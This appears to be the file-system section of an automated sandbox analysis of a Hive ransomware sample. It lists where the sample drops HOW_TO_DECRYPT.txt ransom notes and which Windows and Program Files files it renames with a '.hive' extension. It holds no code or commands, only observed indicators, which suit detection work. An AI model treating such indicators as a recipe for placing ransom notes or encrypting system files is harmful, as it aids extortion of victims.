File created C:\Windows\System32\DriverStore\FileRepository\prnin003.inf_amd64_neutral_3a3c6293d0cda862\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\GroupPolicy\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnca00y.inf_amd64_neutral_64560c72e81f6ad7\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\eval\StarterE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\_Default\StarterN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\HomeBasic\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wpdfs.inf_amd64_neutral_fc4ebadff3a40ae4\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\eaphost.inf_amd64_neutral_4506dea11740c089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\fr\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\OEM\Enterprise\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\ja-JP\Licenses\eval\EnterpriseE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\ja-JP\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\migration\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\spp\tokens\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\LogFiles\SQM\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\WPD\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnky305.inf_amd64_ja-jp_4d77cc4802b17ec3\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\de-DE\Licenses\eval\EnterpriseN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\XPSViewer\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\eval\UltimateN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\sysprep\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\XPSViewer\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_neutral_4b99fffee061ff26\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\de-DE\Licenses\_Default\Starter\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\smartcrd.inf_amd64_neutral_6fb75ea318f84fe5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Setup\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8TXB0XXK\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\migwiz\dlmanifests\Networking-MPSSVC-Svc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\com\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\ProfessionalN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\HomePremiumN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\migration\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\_Default\HomeBasic\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\en-US\Licenses\_Default\UltimateN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WCN\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmolic.inf_amd64_neutral_a53ac1a125d227fc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\IME\imekr8\applets\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\Msdtc\Trace\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\ProfessionalN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\fr-FR\Licenses\eval\HomePremium\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\migwiz\PostMigRes\Web\base_images\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnky302.inf_amd64_ja-jp_dd74fe49601b74f6\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AW10BNB7\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\OEM\HomeBasicN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\de-DE\Licenses\eval\StarterE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\en-US\Licenses\_Default\EnterpriseN\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\SMI\Manifests\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\it-IT\Licenses\eval\HomeBasicE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmc26a.inf_amd64_neutral_547edd894d7c19d9\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnkm004.inf_amd64_neutral_d2aee42dc9c393ea\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-IasServer-MigPlugin\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmrock4.inf_amd64_neutral_e45293c539584293\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\SMI\Store\Machine\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\wbem\xml\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnlx00y.inf_amd64_neutral_977318f2317f5ddd\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\config\TxR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka.-uYcD1toMB6z-bE3g_VWOSQIsO8IMhgF7aX1QOzV71k.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\liberase_plugin.dll.-uYcD1toMB6z-bE3g_VWOXYURyTcJN8z4dP3lvbZulE.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01291_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\css\settings.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OUTLVBS.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\psuser_64.dll.-uYcD1toMB6z-bE3g_VWOZdsFKYB17Nw4Hd7fllFEAk.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\css\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB1B.BDR C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\msdasql.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar.-uYcD1toMB6z-bE3g_VWOWYmM4bVA6goIhfl0etOVCg.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\System.Data.Entity.Resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\RSSFeeds.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianLetter.Dotx C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NEWS.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Easter C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\highDpiImageSwap.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\sw\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files\Java\jre7\bin\plugin2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\ink\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\es-ES\DVDMaker.exe.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena.-uYcD1toMB6z-bE3g_VWOejkriX1C3kBXs7XK-NDOTE.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\RSSFeeds.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libnormvol_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\SETUP.CHM C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPUNCT.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\instrument.dll.-uYcD1toMB6z-bE3g_VWOTM_qx8rQvwbv9OeH7Mlaxw.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcanvas_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Program Files (x86)\Windows Media Player\Network Sharing\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Faculty.accdt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\css\settings.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscene_plugin.dll.-uYcD1toMB6z-bE3g_VWOZckA1cwiKxC3-vmLcM_dxA.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Branding\Basebrd\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\MiguiControls\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\770a605d5193c730225204fa780278ae\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_server-help-chm.mmc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_6fe1f4a7f8512ee9\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-dskquota.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_a35ddd3ab3e846e1\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-feedback-service_31bf3856ad364e35_6.1.7600.16385_none_d5c0e508aa96a650\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-help-netvsta.resources_31bf3856ad364e35_6.1.7600.16385_it-it_8e2308b4c72ddb0e\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-btpanui-mui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_742ca32d0094a20a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_prnhp005.inf.resources_31bf3856ad364e35_6.1.7600.16385_en-us_89c102ed2ea8f023\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-d..utoenroll.resources_31bf3856ad364e35_6.1.7600.16385_it-it_47b8ac96851475dc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-scripting.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2d85ca15abc04414\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
